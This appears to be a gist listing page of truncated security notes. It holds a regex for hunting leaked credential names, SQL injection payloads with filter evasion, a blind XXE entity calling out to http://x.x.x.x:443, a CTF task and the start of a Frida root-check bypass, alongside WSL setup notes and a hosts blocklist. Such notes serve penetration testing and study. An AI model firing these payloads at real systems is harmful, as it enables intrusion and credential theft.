abdilahrf

(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

abdilahrf

Playing with GraphQL when introspection is disabled

Quick write up on extracting a GraphQL schema when introspection is disabled. Bits and pieces sourced from various sources. Successfully tested on an Apollo instance.

TLDR: Some GraphQL instances provide name autocomplete suggestions. Some peeps have written tools to automate the extraction process. (ref https://youtu.be/nPB8o0cSnvM).

1. Bruteforce schema without introspection

First step is using a tool called clairvoyance by @nikitastupin (https://github.com/nikitastupin/clairvoyance). I found the main repo to lack error handling and support for additional features such as proxy.

abdilahrf

`-=[SQL injection Queries]=-

HOW TO SUCCESSFULLY INJECTING SQL INJECTION

[~] after id no. like id=1 +/*!and*/+1=0 [~]
EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5

+div+0
+div false
+Having+1=0+

abdilahrf

# INDIHOM* 
127.0.0.1 x-tags.net
127.0.0.1 a01.uadexchange.com
127.0.0.1 cdn.uzone.id
127.0.0.1 cdn3.uzone.id
127.0.0.1 cfs.uzone.id
127.0.0.1 csf.uzone.id
127.0.0.1 d01.notifa.info
127.0.0.1 d31qbv1cthcecs.cloudfront.net
127.0.0.1 d5nxst8fruw4z.cloudfront.net

abdilahrf

Task

You are given a URI (all happens in the http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/ route) that leads to index.php, the same but ends with index.phps and is an alleged source code of the former, finally, index.php contains a link to auth.php

index.phps listing below

<?php
session_start();

$link = @mysql_connect('localhost', '', '');

@mysql_select_db('', $link);

abdilahrf

				                     _       _ 
				  _______ _ __ ___  | | ___ | |
				 |_  / _ \ '__/ _ \ | |/ _ \| |
				  / /  __/ | | (_) || | (_) | |
				 /___\___|_|  \___(_)_|\___/|_|
				    	  https://zero.lol
				 	  zero days 4 days


				ATTENTION:

abdilahrf

Setup Windows Subsystem 2 for Linux

Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font

To setup native Linux, see this gist

Requirements

abdilahrf

Enable WSL and Ubuntu 16.04 on Windows 10

References:

• https://docs.microsoft.com/en-us/windows/wsl/install-win10
• https://docs.microsoft.com/en-us/windows/wsl/install-manual
• https://docs.microsoft.com/en-us/windows/wsl/user-support
• https://docs.microsoft.com/en-us/windows/wsl/wsl-config

Install and setup

abdilahrf

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

abdilahrf

Frida Tips

The documentation is so limited. A compilation of things I found on StackOverflow and don't want to have to search it up again.

Bypass root check

setTimeout(function() { // avoid java.lang.ClassNotFoundException

  Java.perform(function() {

    // Root detection bypass example